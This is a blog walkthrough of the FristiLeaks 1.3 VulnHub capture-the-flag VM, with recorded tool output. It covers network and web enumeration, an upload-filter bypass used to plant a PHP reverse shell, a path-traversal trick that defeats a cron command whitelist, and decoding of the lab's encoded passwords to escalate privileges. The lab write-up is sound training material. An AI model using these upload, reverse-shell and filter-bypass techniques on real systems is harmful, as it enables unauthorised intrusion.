[VulnHub] FristiLeaks: 1.3

“A small VM made for a Dutch informal hacker meetup called Fristileaks. Meant to be broken in a few hours without requiring debuggers, reverse engineering, etc..” – Ar0xA

[note!!] VMware users will need to manually edit the VM’s MAC address to: 08:00:27:A5:A6:76

More information and OVA file download please check here.

Attacker & Target

Attacker: Kali2 Linux (10.1.1.130/24)

Target: FristiLeaks: 1.3 (10.1.1.150/24)

Vulnerability & Exploit

There is no acutal Vulnerabilities, all you need to do to take down this VM is Enumeration and more enumberation.

  • Create customized dictionary list and brute force to find hidden folders
  • Checking source code / comments
  • Bypass Apache PHP upload verification / whitelist filter
  • Sensitivie information disclosure
  • Local priv escape

Method

  • Scanned the network to discover the target server [arp-scan]
  • Port scanned the target to discover running services and open ports [masscan && nmap]
  • Web application scanned to dig more information about web service [nikto]
  • Create customized dictionary list based on the web pages [cewl]
  • Brute fuzz to find hidden files and paths [wfuzz]
  • Bypass whitelist filter to upload reverse PHP shell
  • Crack a simple encryption program to decode secret string and local priviledge escalation
  • Enumeration and exploit the misconfigured sudo list to get ROOT

Tools

All the tools used here can be found in Kali Linux

Walkthrough

Using arp-scan as routine to detect the target’s IP address.

1
2
3
4
5
6
7
8
9
10
11
root@kali:~/fristileaks# arp-scan -l
Interface: eth0, datalink type: EN10MB (Ethernet)
Starting arp-scan 1.9 with 256 hosts (http://www.nta-monitor.com/tools/arp-scan/)
10.1.1.1  00:50:56:c0:00:08   VMware, Inc.
10.1.1.2  00:50:56:fd:d1:6b   VMware, Inc.
10.1.1.150    08:00:27:a5:a6:76   CADMUS COMPUTER SYSTEMS
10.1.1.254    00:50:56:e5:d1:58   VMware, Inc.

4 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.9: 256 hosts scanned in 2.661 seconds (96.20 hosts/sec). 4 responded
root@kali:~/fristileaks#

10.1.1.150 is our Target!

Then run masscan to detect opening ports on the target (masscan is much faster than nmap when doing a full ports scan, so here I use it to make a full scan and then use nmap to do a deep scan on target ports).

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
# Nmap 6.49BETA5 scan initiated Sun Dec 27 06:52:12 2015 as: nmap -sV -v -A -O -p 80 -oN 10.1.1.150_nmap.txt 10.1.1.150
Nmap scan report for 10.1.1.150
Host is up (0.00041s latency).
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.2.15 ((CentOS) DAV/2 PHP/5.3.3)
| http-methods: GET HEAD POST OPTIONS TRACE
| Potentially risky methods: TRACE
|_See http://nmap.org/nsedoc/scripts/http-methods.html
| http-robots.txt: 3 disallowed entries
|_/cola /sisi /beer
|_http-server-header: Apache/2.2.15 (CentOS) DAV/2 PHP/5.3.3
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
MAC Address: 08:00:27:A5:A6:76 (Cadmus Computer Systems)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 2.6.X|3.X
OS CPE: cpe:/o:linux:linux_kernel:2.6 cpe:/o:linux:linux_kernel:3
OS details: Linux 2.6.32 - 3.10, Linux 2.6.32 - 3.13
Uptime guess: 49.708 days (since Sat Nov  7 13:52:17 2015)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=258 (Good luck!)
IP ID Sequence Generation: All zeros

TRACEROUTE
HOP RTT     ADDRESS
1   0.41 ms 10.1.1.150

Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Dec 27 06:52:21 2015 -- 1 IP address (1 host up) scanned in 10.27 seconds

based on the result, I noticed that there are three folders:

  • /cola
  • /sisi
  • /beer

Also, from the response header: Apache/2.2.15 (CentOS) DAV/2 PHP/5.3.3, I know the target is running Apache version 2.2.15 which is outdated, and the keyword DAV/2 shows that WebDAV should be enabled.

In the meanwhile, I run nikto to scan web vulnerabilities.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
root@kali:~# nikto -host http://10.1.1.150
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          10.1.1.150
+ Target Hostname:    10.1.1.150
+ Target Port:        80
+ Start Time:         2015-12-27 06:53:18 (GMT-5)
---------------------------------------------------------------------------
+ Server: Apache/2.2.15 (CentOS) DAV/2 PHP/5.3.3
+ Server leaks inodes via ETags, header found with file /, inode: 12722, size: 703, mtime: Tue Nov 17 13:45:47 2015
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Entry '/cola/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/sisi/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/beer/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ "robots.txt" contains 3 entries which should be manually viewed.
+ Apache/2.2.15 appears to be outdated (current is at least Apache/2.4.12). Apache 2.0.65 (final release) and 2.2.29 are also current.
+ PHP/5.3.3 appears to be outdated (current is at least 5.6.9). PHP 5.5.25 and 5.4.41 are also current.
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS, TRACE
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
+ OSVDB-3268: /icons/: Directory indexing found.
+ OSVDB-3268: /images/: Directory indexing found.
+ OSVDB-3268: /images/?pattern=/etc/*&sort=name: Directory indexing found.
+ OSVDB-3233: /icons/README: Apache default file found.
+ 8330 requests: 0 error(s) and 16 item(s) reported on remote host
+ End Time:           2015-12-27 06:53:38 (GMT-5) (20 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

The result just proved what we have found previously but nothing new.

Then I visit the three folders one by one, but keep getting the same responded picture:

After tried dirbuster with several default dictionary files but nothing found, I decided to make a customized dict list which including all the words displayed in the web pages and images with tool cewl.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
root@kali:~/fristileaks# cewl -v -d 2 -w cewl_dict_list.txt  http://10.1.1.150/
root@kali:~/fristileaks# cat cewl_dict_list.txt
Ar0xA
meneer
quick
hackme
Welcome
Goal
get
UID
root
and
read
the
special
flag
file
Timeframe
should
doable
hours
The
fristileaks
motto
Fristileaks
2015
are
Fristleaks
barrebas
rikvduijn
wez3forsec
PyroBatNL
0xDUDE
annejanbrouwer
Sander2121
Reinierk
DearCharles
miamat
MisterXE
BasB
Dwight
Egeltje
pdersjant
tcp130x10
spierenburg
ielmatani
renepieters
Mystery
guest
uinix
WhatSecurity
mramsmeets
fristi
drink
keep
calm

Then I use wfuzz to discover any possible hidden path.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
root@kali:~/fristileaks# wfuzz -c -z file,cewl_dict_list.txt --hc 404 http://10.1.1.150/FUZZ

********************************************************
* Wfuzz  2.0 - The Web Bruteforcer                     *
********************************************************

Target: http://10.1.1.150/FUZZ
Payload type: file,cewl.txt

Total requests: 54
==================================================================
ID    Response   Lines      Word         Chars          Request
==================================================================

00051:  C=301      7 L         20 W       233 Ch     " - fristi"


root@kali:~/fristileaks#

From the result, there is one folder found fristi.

By visiting the new found path http://10.1.1.150/fristi/, a login page appeared in my firefox.

After tried some weak passwords but all failed, I found some clues in the source code.

First thing is that there is a comment written by eezeepz, in the top of the code:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
<html>
<head>
<meta name="description" content="super leet password login-test page. We use base64 encoding for images so they are inline in the HTML. I read somewhere on the web, that thats a good way to do it.">
<!--
TODO:
We need to clean this up for production. I left some junk in here to make testing easier. 

- by eezeepz
-->
</head>
<body>
<center>
<h1> Welcome to #fristileaks admin portal</h1>
</center>

and another comment, which is a base64 encoded string, has been inserted at the very bottom of the source code:

1
2
3
<!--
iVBORw0KGgoAAAANSUhEUgAAAW0AAABLCAIAAAA04UHqAAAAAXNSR0IArs4c6QAAAARnQU1BAACx jwv8YQUAAAAJcEhZcwAADsMAAA7DAcdvqGQAAARSSURBVHhe7dlRdtsgEIVhr8sL8nqymmwmi0kl S0iAQGY0Nb01//dWSQyTgdxz2t5+AcCHHAHgRY4A8CJHAHiRIwC8yBEAXuQIAC9yBIAXOQLAixw B4EWOAPAiRwB4kSMAvMgRAF7kCAAvcgSAFzkCwIscAeBFjgDwIkcAeJEjALzIEQBe5AgAL5kc+f m63yaP7/XP/5RUM2jx7iMz1ZdqpguZHPl+zJO53b9+1gd/0TL2Wull5+RMpJq5tMTkE1paHlVXJJ Zv7/d5i6qse0t9rWa6UMsR1+WrORl72DbdWKqZS0tMPqGl8LRhzyWjWkTFDPXFmulC7e81bxnNOvb DpYzOMN1WqplLS0w+oaXwomXXtfhL8e6W+lrNdDFujoQNJ9XbKtHMpSUmn9BSeGf51bUcr6W+VjNd jJQjcelwepPCjlLNXFpi8gktXfnVtYSd6UpINdPFCDlyKB3dyPLpSTVzZYnJR7R0WHEiFGv5NrDU 12qmC/1/Zz2ZWXi1abli0aLqjZdq5sqSxUgtWY7syq+u6UpINdOFeI5ENygbTfj+qDbc+QpG9c5 uvFQzV5aM15LlyMrfnrPU12qmC+Ucqd+g6E1JNsX16/i/6BtvvEQzF5YM2JLhyMLz4sNNtp/pSkg1 04VajmwziEdZvmSz9E0YbzbI/FSycgVSzZiXDNmS4cjCni+kLRnqizXThUqOhEkso2k5pGy00aLq i1n+skSqGfOSIVsKC5Zv4+XH36vQzbl0V0t9rWb6EMyRaLLp+Bbhy31k8SBbjqpUNSHVjHXJmC2Fg tOH0drysrz404sdLPW1mulDLUdSpdEsk5vf5Gtqg1xnfX88tu/PZy7VjHXJmC21H9lWvBBfdZb6Ws 30oZ0jk3y+pQ9fnEG4lNOco9UnY5dqxrhk0JZKezwdNwqfnv6AOUN9sWb6UMyR5zT2B+lwDh++Fl 3K/U+z2uFJNWNcMmhLzUe2v6n/dAWG+mLN9KGWI9EcKsMJl6o6+ecH8dv0Uu4PnkqDl2rGuiS8HK ul9iMrFG9gqa/VTB8qORLuSTqF7fYU7tgsn/4+zfhV6aiiIsczlGrGvGTIlsLLhiPbnh6KnLDU12q mD+0cKQ8nunpVcZ21Rj7erEz0WqoZ+5IRW1oXNB3Z/vBMWulSfYlm+hDLkcIAtuHEUzu/l9l867X34 rPtA6lmLi0ZrqX6gu37aIukRkVaylRfqpk+9HNkH85hNocTKC4P31Vebhd8fy/VzOTCkqeBWlrrFhe EPdMjO3SSys7XVF+qmT5UcmT9+Ss//fyyOLU3kWoGLd59ZKb6Us10IZMjAP5b5AgAL3IEgBc5AsCLH AHgRY4A8CJHAHiRIwC8yBEAXuQIAC9yBIAXOQLAixwB4EWOAPAiRwB4kSMAvMgRAF7kCAAvcgSAFzk CwIscAeBFjgDwIkcAeJEjALzIEQBe5AgAL3IEgBc5AsCLHAHgRY4A8Pn9/QNa7zik1qtycQAAAABJR U5ErkJggg==
-->

[note!!] before decoding, we have to remove newlines from each line, tr can be used to fix that:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
root@kali:~/fristileaks# cat test.txt

iVBORw0KGgoAAAANSUhEUgAAAW0AAABLCAIAAAA04UHqAAAAAXNSR0IArs4c6QAAAARnQU1BAACx
jwv8YQUAAAAJcEhZcwAADsMAAA7DAcdvqGQAAARSSURBVHhe7dlRdtsgEIVhr8sL8nqymmwmi0kl
S0iAQGY0Nb01//dWSQyTgdxz2t5+AcCHHAHgRY4A8CJHAHiRIwC8yBEAXuQIAC9yBIAXOQLAixw
B4EWOAPAiRwB4kSMAvMgRAF7kCAAvcgSAFzkCwIscAeBFjgDwIkcAeJEjALzIEQBe5AgAL5kc+f
m63yaP7/XP/5RUM2jx7iMz1ZdqpguZHPl+zJO53b9+1gd/0TL2Wull5+RMpJq5tMTkE1paHlVXJJ
Zv7/d5i6qse0t9rWa6UMsR1+WrORl72DbdWKqZS0tMPqGl8LRhzyWjWkTFDPXFmulC7e81bxnNOvb
DpYzOMN1WqplLS0w+oaXwomXXtfhL8e6W+lrNdDFujoQNJ9XbKtHMpSUmn9BSeGf51bUcr6W+VjNd
jJQjcelwepPCjlLNXFpi8gktXfnVtYSd6UpINdPFCDlyKB3dyPLpSTVzZYnJR7R0WHEiFGv5NrDU
12qmC/1/Zz2ZWXi1abli0aLqjZdq5sqSxUgtWY7syq+u6UpINdOFeI5ENygbTfj+qDbc+QpG9c5
uvFQzV5aM15LlyMrfnrPU12qmC+Ucqd+g6E1JNsX16/i/6BtvvEQzF5YM2JLhyMLz4sNNtp/pSkg1
04VajmwziEdZvmSz9E0YbzbI/FSycgVSzZiXDNmS4cjCni+kLRnqizXThUqOhEkso2k5pGy00aLq
i1n+skSqGfOSIVsKC5Zv4+XH36vQzbl0V0t9rWb6EMyRaLLp+Bbhy31k8SBbjqpUNSHVjHXJmC2Fg
tOH0drysrz404sdLPW1mulDLUdSpdEsk5vf5Gtqg1xnfX88tu/PZy7VjHXJmC21H9lWvBBfdZb6Ws
30oZ0jk3y+pQ9fnEG4lNOco9UnY5dqxrhk0JZKezwdNwqfnv6AOUN9sWb6UMyR5zT2B+lwDh++Fl
3K/U+z2uFJNWNcMmhLzUe2v6n/dAWG+mLN9KGWI9EcKsMJl6o6+ecH8dv0Uu4PnkqDl2rGuiS8HK
ul9iMrFG9gqa/VTB8qORLuSTqF7fYU7tgsn/4+zfhV6aiiIsczlGrGvGTIlsLLhiPbnh6KnLDU12q
mD+0cKQ8nunpVcZ21Rj7erEz0WqoZ+5IRW1oXNB3Z/vBMWulSfYlm+hDLkcIAtuHEUzu/l9l867X34
rPtA6lmLi0ZrqX6gu37aIukRkVaylRfqpk+9HNkH85hNocTKC4P31Vebhd8fy/VzOTCkqeBWlrrFhe
EPdMjO3SSys7XVF+qmT5UcmT9+Ss//fyyOLU3kWoGLd59ZKb6Us10IZMjAP5b5AgAL3IEgBc5AsCLH
AHgRY4A8CJHAHiRIwC8yBEAXuQIAC9yBIAXOQLAixwB4EWOAPAiRwB4kSMAvMgRAF7kCAAvcgSAFzk
CwIscAeBFjgDwIkcAeJEjALzIEQBe5AgAL3IEgBc5AsCLHAHgRY4A8Pn9/QNa7zik1qtycQAAAABJR
U5ErkJggg==
root@kali:~/fristileaks# tr -d '\n' < test.txt > base64_decoded.txt
root@kali:~/fristileaks# cat base64_decoded.txt
iVBORw0KGgoAAAANSUhEUgAAAW0AAABLCAIAAAA04UHqAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsMAAA7DAcdvqGQAAARSSURBVHhe7dlRdtsgEIVhr8sL8nqymmwmi0klS0iAQGY0Nb01//dWSQyTgdxz2t5+AcCHHAHgRY4A8CJHAHiRIwC8yBEAXuQIAC9yBIAXOQLAixwB4EWOAPAiRwB4kSMAvMgRAF7kCAAvcgSAFzkCwIscAeBFjgDwIkcAeJEjALzIEQBe5AgAL5kc+fm63yaP7/XP/5RUM2jx7iMz1ZdqpguZHPl+zJO53b9+1gd/0TL2Wull5+RMpJq5tMTkE1paHlVXJJZv7/d5i6qse0t9rWa6UMsR1+WrORl72DbdWKqZS0tMPqGl8LRhzyWjWkTFDPXFmulC7e81bxnNOvbDpYzOMN1WqplLS0w+oaXwomXXtfhL8e6W+lrNdDFujoQNJ9XbKtHMpSUmn9BSeGf51bUcr6W+VjNdjJQjcelwepPCjlLNXFpi8gktXfnVtYSd6UpINdPFCDlyKB3dyPLpSTVzZYnJR7R0WHEiFGv5NrDU12qmC/1/Zz2ZWXi1abli0aLqjZdq5sqSxUgtWY7syq+u6UpINdOFeI5ENygbTfj+qDbc+QpG9c5uvFQzV5aM15LlyMrfnrPU12qmC+Ucqd+g6E1JNsX16/i/6BtvvEQzF5YM2JLhyMLz4sNNtp/pSkg104VajmwziEdZvmSz9E0YbzbI/FSycgVSzZiXDNmS4cjCni+kLRnqizXThUqOhEkso2k5pGy00aLqi1n+skSqGfOSIVsKC5Zv4+XH36vQzbl0V0t9rWb6EMyRaLLp+Bbhy31k8SBbjqpUNSHVjHXJmC2FgtOH0drysrz404sdLPW1mulDLUdSpdEsk5vf5Gtqg1xnfX88tu/PZy7VjHXJmC21H9lWvBBfdZb6Ws30oZ0jk3y+pQ9fnEG4lNOco9UnY5dqxrhk0JZKezwdNwqfnv6AOUN9sWb6UMyR5zT2B+lwDh++Fl3K/U+z2uFJNWNcMmhLzUe2v6n/dAWG+mLN9KGWI9EcKsMJl6o6+ecH8dv0Uu4PnkqDl2rGuiS8HKul9iMrFG9gqa/VTB8qORLuSTqF7fYU7tgsn/4+zfhV6aiiIsczlGrGvGTIlsLLhiPbnh6KnLDU12qmD+0cKQ8nunpVcZ21Rj7erEz0WqoZ+5IRW1oXNB3Z/vBMWulSfYlm+hDLkcIAtuHEUzu/l9l867X34rPtA6lmLi0ZrqX6gu37aIukRkVaylRfqpk+9HNkH85hNocTKC4P31Vebhd8fy/VzOTCkqeBWlrrFheEPdMjO3SSys7XVF+qmT5UcmT9+Ss//fyyOLU3kWoGLd59ZKb6Us10IZMjAP5b5AgAL3IEgBc5AsCLHAHgRY4A8CJHAHiRIwC8yBEAXuQIAC9yBIAXOQLAixwB4EWOAPAiRwB4kSMAvMgRAF7kCAAvcgSAFzkCwIscAeBFjgDwIkcAeJEjALzIEQBe5AgAL3IEgBc5AsCLHAHgRY4A8Pn9/QNa7zik1qtycQAAAABJRU5ErkJggg==

After decoded this, I got a PNG file:

In terms of all the information we collected from this page/source code, I can guess the username is eezeepz and the password is keKkeKKeKKeKkEkkEk.

After login, I got a link to allow us upload file!

But when I trying to upload .php webshell, I got the following error, only png, jpg and gif are allowed.

In order to bypass the whitelist verification, I added .jpg at the end of the web shell’s file name to make it looks like rsh.php.jpg.

rsh.php is a reverse PHP shell which will connect back to my Kali’s tcp port 5555, so before I upload and trigger the shell, I setup nc to listen on port 5555.

Ok, after uploaded the reverse PHP shell, I can now visit it from uploads folder, the url is http://10.1.1.150/fristi/uploads/rsh.php.jpg.

Bingo! I got a shell now.

After enumeration I found Database sensitive information stored in the file /var/www/html/fristi/checklogin.php, user name eezeepz and the password is 4ll3maal12#

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
<\?php

ob_start();
$host="localhost"; // Host name
$username="eezeepz"; // Mysql username
$password="4ll3maal12#"; // Mysql password
$db_name="hackmenow"; // Database name
$tbl_name="members"; // Table name

// Connect to server and select databse.
mysql_connect("$host", "$username", "$password")or die("cannot connect");
mysql_select_db("$db_name")or die("cannot select DB");

// Define $myusername and $mypassword
$myusername=$_POST['myusername'];
$mypassword=$_POST['mypassword'];

... turncate ...

The first thing I thought was to login via SSH with the found username and password, but SSH is not running on the target server.

Then, I tried su command but it has too be called from a TTY session. by using the trick python -c "import pty; pty.spawn('/bin/bash');" to jail break, I can try su again with the login credential. But still failed, Damn, the password is wrong.

1
2
3
4
5
6
7
sh-4.1$ python -c "import pty; pty.spawn('/bin/bash');"
python -c "import pty; pty.spawn('/bin/bash');"
bash-4.1$ su eezeepz
su eezeepz
Password: 4ll3maal12#

idsu: incorrect password

So I have to keep digging further, then I found a clue file notes.txt under the path /var/www/.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
sh-4.1$ pwd
/var/www
pwd
sh-4.1$ ls -al
ls -al
total 28
drwxr-xr-x.  6 root root 4096 Nov 17 13:50 .
drwxr-xr-x. 19 root root 4096 Nov 19 01:41 ..
drwxr-xr-x.  2 root root 4096 Aug 24 13:53 cgi-bin
drwxr-xr-x.  3 root root 4096 Nov 17 03:29 error
drwxr-xr-x.  7 root root 4096 Nov 25 04:10 html
drwxr-xr-x.  3 root root 4096 Nov 17 03:37 icons
-rw-r--r--   1 root root   98 Nov 17 13:50 notes.txt
sh-4.1$ cat notes.txt
cat notes.txt
hey eezeepz your homedir is a mess, go clean it up, just dont delete
the important stuff.

-jerry
sh-4.1$ 

In that file, jerry mentioned home directory about user eezeepz. by following this clue, I checked /home directory:

1
2
3
4
5
6
7
8
9
10
11
sh-4.1$ cd /home
cd /home
sh-4.1$ ls -al
ls -al
total 28
drwxr-xr-x.  5 root      root       4096 Nov 19 01:40 .
dr-xr-xr-x. 22 root      root       4096 Dec 27 17:50 ..
drwx------.  2 admin     admin      4096 Nov 19 02:03 admin
drwx---r-x.  5 eezeepz   eezeepz   12288 Nov 18 15:35 eezeepz
drwx------   2 fristigod fristigod  4096 Nov 19 01:40 fristigod
sh-4.1$

As we can see from above, home folder eezeepz has global read and execute permission for anyone.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
sh-4.1$ ls -al
ls -al
total 2608
drwx---r-x. 5 eezeepz eezeepz  12288 Nov 18 15:35 .
drwxr-xr-x. 5 root    root      4096 Nov 19 01:40 ..
drwxrwxr-x. 2 eezeepz eezeepz   4096 Nov 17 09:40 .Old
-rw-r--r--. 1 eezeepz eezeepz     18 Sep 22 12:40 .bash_logout
-rw-r--r--. 1 eezeepz eezeepz    176 Sep 22 12:40 .bash_profile
-rw-r--r--. 1 eezeepz eezeepz    124 Sep 22 12:40 .bashrc
drwxrwxr-x. 2 eezeepz eezeepz   4096 Nov 17 09:40 .gnome
drwxrwxr-x. 2 eezeepz eezeepz   4096 Nov 17 09:40 .settings
-rwxr-xr-x. 1 eezeepz eezeepz  24376 Nov 17 09:49 MAKEDEV
-rwxr-xr-x. 1 eezeepz eezeepz  33559 Nov 17 09:49 cbq
-rwxr-xr-x. 1 eezeepz eezeepz   6976 Nov 17 09:49 cciss_id
-rwxr-xr-x. 1 eezeepz eezeepz  56720 Nov 17 09:49 cfdisk
-rwxr-xr-x. 1 eezeepz eezeepz  25072 Nov 17 09:49 chcpu
-rwxr-xr-x. 1 eezeepz eezeepz  52936 Nov 17 09:48 chgrp
-rwxr-xr-x. 1 eezeepz eezeepz  31800 Nov 17 09:49 chkconfig
-rwxr-xr-x. 1 eezeepz eezeepz  48712 Nov 17 09:48 chmod
-rwxr-xr-x. 1 eezeepz eezeepz  53640 Nov 17 09:48 chown
-rwxr-xr-x. 1 eezeepz eezeepz  44528 Nov 17 09:49 clock
-rwxr-xr-x. 1 eezeepz eezeepz   4808 Nov 17 09:49 consoletype
-rwxr-xr-x. 1 eezeepz eezeepz 129992 Nov 17 09:48 cpio
-rwxr-xr-x. 1 eezeepz eezeepz  38608 Nov 17 09:49 cryptsetup
-rwxr-xr-x. 1 eezeepz eezeepz   5344 Nov 17 09:49 ctrlaltdel
-rwxr-xr-x. 1 eezeepz eezeepz  41704 Nov 17 09:48 cut
-rwxr-xr-x. 1 eezeepz eezeepz  14832 Nov 17 09:49 halt
-rwxr-xr-x. 1 eezeepz eezeepz  13712 Nov 17 09:49 hostname
-rwxr-xr-x. 1 eezeepz eezeepz  44528 Nov 17 09:49 hwclock
-rwxr-xr-x. 1 eezeepz eezeepz   7920 Nov 17 09:49 kbd_mode
-rwxr-xr-x. 1 eezeepz eezeepz  11576 Nov 17 09:49 kill
-rwxr-xr-x. 1 eezeepz eezeepz  16472 Nov 17 09:49 killall5
-rwxr-xr-x. 1 eezeepz eezeepz  32928 Nov 17 09:49 kpartx
-rwxr-xr-x. 1 eezeepz eezeepz  11464 Nov 17 09:49 nameif
-rwxr-xr-x. 1 eezeepz eezeepz 171784 Nov 17 09:49 nano
-rwxr-xr-x. 1 eezeepz eezeepz   5512 Nov 17 09:49 netreport
-rwxr-xr-x. 1 eezeepz eezeepz 123360 Nov 17 09:49 netstat
-rwxr-xr-x. 1 eezeepz eezeepz  13892 Nov 17 09:49 new-kernel-pkg
-rwxr-xr-x. 1 eezeepz eezeepz  25208 Nov 17 09:49 nice
-rwxr-xr-x. 1 eezeepz eezeepz  13712 Nov 17 09:49 nisdomainname
-rwxr-xr-x. 1 eezeepz eezeepz   4736 Nov 17 09:49 nologin
-r--r--r--. 1 eezeepz eezeepz    514 Nov 18 14:53 notes.txt
-rwxr-xr-x. 1 eezeepz eezeepz 390616 Nov 17 09:49 tar
-rwxr-xr-x. 1 eezeepz eezeepz  11352 Nov 17 09:49 taskset
-rwxr-xr-x. 1 eezeepz eezeepz 249000 Nov 17 09:49 tc
-rwxr-xr-x. 1 eezeepz eezeepz  51536 Nov 17 09:49 telinit
-rwxr-xr-x. 1 eezeepz eezeepz  47928 Nov 17 09:49 touch
-rwxr-xr-x. 1 eezeepz eezeepz  11440 Nov 17 09:49 tracepath
-rwxr-xr-x. 1 eezeepz eezeepz  12304 Nov 17 09:49 tracepath6
-rwxr-xr-x. 1 eezeepz eezeepz  21112 Nov 17 09:49 true
-rwxr-xr-x. 1 eezeepz eezeepz  35608 Nov 17 09:49 tune2fs
-rwxr-xr-x. 1 eezeepz eezeepz  15410 Nov 17 09:49 weak-modules
-rwxr-xr-x. 1 eezeepz eezeepz  12216 Nov 17 09:49 wipefs
-rwxr-xr-x. 1 eezeepz eezeepz 504400 Nov 17 09:49 xfs_repair
-rwxr-xr-x. 1 eezeepz eezeepz  13712 Nov 17 09:49 ypdomainname
-rwxr-xr-x. 1 eezeepz eezeepz     62 Nov 17 09:49 zcat
-rwxr-xr-x. 1 eezeepz eezeepz  47520 Nov 17 09:47 zic
sh-4.1$ 

Well, it is really mess. but we can notice that there is another notes.txt which should be more clues in it.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
sh-4.1$ cat notes.txt
cat notes.txt
Yo EZ,

I made it possible for you to do some automated checks,
but I did only allow you access to /usr/bin/* system binaries. I did
however copy a few extra often needed commands to my
homedir: chmod, df, cat, echo, ps, grep, egrep so you can use those
from /home/admin/

Don't forget to specify the full path for each binary!

Just put a file called "runthis" in /tmp/, each line one command. The
output goes to the file "cronresult" in /tmp/. It should
run every minute with my account privileges.

- Jerry
sh-4.1$ 

Looks like I have to break out of jail from runthis. So I create the file runthis under /tmp, which only including one command chmod 777 /home/admin to change folder permission of /home/admin. However, after couple of seconds waiting, I got the error information: command did not start with /home/admin or /usr/bin.

1
2
3
4
5
6
bash-4.1$ cat /tmp/run   
cat /tmp/runthis
chmod 777 /home/admin
bash-4.1$ cat /tmp/cron   
cat /tmp/cronresult
command did not start with /home/admin or /usr/bin

Ok ok… so the command have to start with /home/admin or /usr/bin, so I modified the runthis file to /home/admin/../../bin/chmod -R 777 /home/admin, and waiting seconds, the /home/admin has been set to full permission now!

1
2
3
4
5
6
7
8
bash-4.1$ ls -al /home
ls -al /home
total 28
drwxr-xr-x.  5 root      root       4096 Nov 19 01:40 .
dr-xr-xr-x. 22 root      root       4096 Dec 27 17:50 ..
drwxrwxrwx.  2 admin     admin      4096 Nov 19 02:03 admin
drwx---r-x.  5 eezeepz   eezeepz   12288 Nov 18 15:35 eezeepz
drwx------   2 fristigod fristigod  4096 Nov 19 01:40 fristigod

Get into /home/admin and enumeration, found three suspect files: cryptedpass.txt, cryptpass.py and whoisyourgodnow.txt.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
bash-4.1$ pwd
pwd
/home/admin
bash-4.1$ ls -al
ls -al
total 652
drwxrwxrwx. 2 admin     admin       4096 Nov 19 02:03 .
drwxr-xr-x. 5 root      root        4096 Nov 19 01:40 ..
-rwxrwxrwx. 1 admin     admin         18 Sep 22 12:40 .bash_logout
-rwxrwxrwx. 1 admin     admin        176 Sep 22 12:40 .bash_profile
-rwxrwxrwx. 1 admin     admin        124 Sep 22 12:40 .bashrc
-rwxrwxrwx  1 admin     admin      45224 Nov 18 13:42 cat
-rwxrwxrwx  1 admin     admin      48712 Nov 18 14:14 chmod
-rwxrwxrwx  1 admin     admin        737 Nov 18 14:48 cronjob.py
-rwxrwxrwx  1 admin     admin         21 Nov 18 15:21 cryptedpass.txt
-rwxrwxrwx  1 admin     admin        258 Nov 18 15:20 cryptpass.py
-rwxrwxrwx  1 admin     admin      90544 Nov 18 13:49 df
-rwxrwxrwx  1 admin     admin      24136 Nov 18 13:40 echo
-rwxrwxrwx  1 admin     admin     163600 Nov 18 13:42 egrep
-rwxrwxrwx  1 admin     admin     163600 Nov 18 13:42 grep
-rwxrwxrwx  1 admin     admin      85304 Nov 18 13:41 ps
-rw-r--r--  1 fristigod fristigod     25 Nov 19 01:47 whoisyourgodnow.txt

The file cryptedpass.txt contain crypted string mVGZ3O3omkJLmy2pcuTq and the file cryptpass.py seems a crypto program which the process is

  • base64 encoded
  • reverse the string
  • encode the reversed string via rot13
1
2
3
4
5
6
7
8
9
10
11
12
13
cat cryptedpass.txt
mVGZ3O3omkJLmy2pcuTq
bash-4.1$ cat cryptpass.py
cat cryptpass.py
#Enhanced with thanks to Dinesh Singh Sikawar @LinkedIn
import base64,codecs,sys

def encodeString(str):
    base64string= base64.b64encode(str)
    return codecs.encode(base64string[::-1], 'rot13')

cryptoResult=encodeString(sys.argv[1])
print cryptoResult

By using python, I decoded the secret string and got the plain text is thisisalsopw123.

1
2
3
4
>>> import base64
>>> cryptedtxt='mVGZ3O3omkJLmy2pcuTq'
>>> base64.b64decode((cryptedtxt.decode('rot13')[::-1]))
'thisisalsopw123'

The same method to crack the secret string in whoisyourgodnow.txt

1
2
3
4
>>> cryptedtxt='=RFn0AKnlMHMPIzpyuTI0ITG'
>>> base64.b64decode((cryptedtxt.decode('rot13')[::-1]))
'LetThereBeFristi!'
>>>

My best guess is that LetThereBeFristi! is the password of the user fristigod … and … Yes! I am fristigod now!

